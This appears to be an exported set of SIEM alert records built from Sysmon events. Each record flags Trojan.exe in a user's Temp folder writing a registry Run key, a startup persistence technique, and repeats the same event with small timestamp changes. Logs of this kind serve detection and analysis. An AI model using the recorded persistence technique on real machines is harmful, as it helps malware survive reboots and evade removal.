HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 
13:23:46.906"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:21:05.152",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:23:45.879 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:23:45.916255100Z"",""eventRecordID"":""1335"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:23:45.879\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: 
HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:23:45.879"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:21:04.704",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:23:44.828 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" 
..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:23:44.833070900Z"",""eventRecordID"":""1333"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:23:44.828\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:23:44.828"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." 
+"May 24, 2020 @ 16:21:04.343",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:23:43.785 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:23:43.808625600Z"",""eventRecordID"":""1331"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:23:43.785\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 
13:23:43.785"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:21:04.334",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:23:42.742 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:23:42.809053100Z"",""eventRecordID"":""1330"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:23:42.742\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: 
HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:23:42.742"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:21:03.249",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:23:41.691 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" 
..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:23:41.736541700Z"",""eventRecordID"":""1323"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:23:41.691\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:23:41.691"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." 
+"May 24, 2020 @ 16:21:01.685",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:23:40.625 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:23:40.626463100Z"",""eventRecordID"":""1321"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:23:40.625\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 
13:23:40.625"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:21:01.385",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:23:39.621 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:23:39.721057500Z"",""eventRecordID"":""1318"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:23:39.621\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: 
HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:23:39.621"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:21:00.153",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:23:38.558 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" 
..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:23:38.565602300Z"",""eventRecordID"":""1317"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:23:38.558\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:23:38.558"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." 
+"May 24, 2020 @ 16:20:59.307",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:23:37.543 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:23:37.558363600Z"",""eventRecordID"":""1316"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:23:37.543\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 
13:23:37.543"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:20:51.255",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:23:36.529 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:23:36.533973900Z"",""eventRecordID"":""1314"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:23:36.529\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: 
HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:23:36.529"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:20:51.066",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:23:35.523 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" 
..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:23:35.557402500Z"",""eventRecordID"":""1313"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:23:35.523\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: 